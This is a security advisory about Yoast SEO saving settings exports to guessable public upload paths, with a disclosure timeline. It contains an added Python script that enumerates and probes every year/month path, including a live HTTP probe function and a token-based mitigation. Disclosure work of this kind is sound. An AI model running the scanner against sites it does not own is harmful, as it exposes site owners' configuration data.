Information Disclosure Vulnerability in Yoast SEO
Recently the security company Wordfence released an advisory for the Yoast SEO plugin for what seems to be a rather minor issue: logged-in users could access several functions of Yoast SEO that they were not intended to have access to, including exporting the plugin’s settings. While reviewing that advisory to include it in our service’s data, we noticed a related problem: there was also an issue with the cross-site request forgery (CSRF) protection in the export function of the plugin.
The plugin now restricts the export function to Administrator-level users (by requiring the manage_options capability), and it was supposed to have CSRF protection, which together indicate that the result of that export should not be available to the public. In normal circumstances the exported settings do not look like sensitive data, so public access to them does not seem to be a major issue at this point, but that could change, so making sure the file is not easily accessible to the public seems like a good idea. Currently that isn’t the case.
When doing an export of the settings this month, the file was saved at:
/wp-content/uploads/2016/05/settings.zip
Last month it was saved at:
/wp-content/uploads/2016/04/settings.zip
Not only are files in that location normally accessible to the public, it would also be very easy for someone to find every possible file location by simply requesting all of the possible year and month combinations.
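To make the enumeration concrete, here is an added example (not code from the original post or from the Yoast SEO plugin) that generates every year/month upload path for the fixed file name, probes each one through an injectable fetch function, and contrasts that with the mitigation suggested below: a per-export random token in the file name. The base URL `https://example.invalid`, the "site" containing April and May 2016 exports, and the `stub_fetch` function are all constructed for the example; `http_head_status` is the real standard-library probe you would pass in against an actual site.

```python
"""Enumerate predictable Yoast SEO settings-export paths (added example)."""
import secrets
from datetime import date
from typing import Callable, Iterable, List, Optional

UPLOAD_PREFIX = "/wp-content/uploads"   # default WordPress upload directory
EXPORT_NAME = "settings.zip"            # fixed file name observed in the post


def candidate_paths(start_year: int, end: Optional[date] = None) -> List[str]:
    """Every /wp-content/uploads/YYYY/MM/settings.zip path from start_year
    through the month of `end` (default: today). The search space is only
    12 paths per year, which is why a fixed name is trivially enumerable."""
    end = end or date.today()
    paths = []
    for year in range(start_year, end.year + 1):
        last_month = end.month if year == end.year else 12
        for month in range(1, last_month + 1):
            paths.append(f"{UPLOAD_PREFIX}/{year}/{month:02d}/{EXPORT_NAME}")
    return paths


def find_exports(base_url: str, paths: Iterable[str],
                 fetch: Callable[[str], int]) -> List[str]:
    """Return the URLs for which fetch() reports HTTP 200.
    fetch is injected so the caller can pass a real HTTP probe or a stub."""
    return [base_url + p for p in paths if fetch(base_url + p) == 200]


def http_head_status(url: str) -> int:
    """Real probe using only the standard library: a HEAD request,
    returning the status code (404 for missing files on most hosts)."""
    import urllib.error
    import urllib.request
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def unique_export_path(year: int, month: int, token_bytes: int = 16) -> str:
    """The mitigation the post suggests: a unique value in the file name.
    With 16 random bytes there are 2**128 possible names per month, so the
    year/month enumeration above no longer finds the file. (Assumed design;
    not a description of how the plugin itself was fixed.)"""
    token = secrets.token_hex(token_bytes)
    return f"{UPLOAD_PREFIX}/{year}/{month:02d}/settings-{token}.zip"


# Constructed stand-in for a site that has exports from April and May 2016,
# the two months mentioned in the post.
CONSTRUCTED_BASE_URL = "https://example.invalid"
CONSTRUCTED_SITE = {
    "/wp-content/uploads/2016/04/settings.zip",
    "/wp-content/uploads/2016/05/settings.zip",
}


def stub_fetch(url: str) -> int:
    """Offline replacement for http_head_status against the constructed site."""
    path = url[len(CONSTRUCTED_BASE_URL):]
    return 200 if path in CONSTRUCTED_SITE else 404


if __name__ == "__main__":
    # Scan from 2015 through May 2016: 17 requests find both exports.
    paths = candidate_paths(2015, date(2016, 5, 31))
    print(f"{len(paths)} candidate paths")
    for url in find_exports(CONSTRUCTED_BASE_URL, paths, stub_fetch):
        print("found:", url)
    print("unpredictable alternative:", unique_export_path(2016, 5))
```

Against a live site, replace `stub_fetch` with `http_head_status`; the scan stays cheap because the only variable part of the path is the month, which is exactly the weakness a random token in the file name removes.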
We notified the developer about this issue alongside the CSRF issue on Friday. Yesterday they indicated that it would be a month before they fixed the CSRF issue, but made no mention of this issue, so who knows if they are interested in fixing it. It would be fairly easy to fix by simply adding a unique value to the name of the file.
Timeline
- 5/6/2016 – Developer notified.
- 5/10/2016 – Response from developer with no reply on this issue.
- 6/21/2016 – Version 3.3.2 released, which fixes vulnerability.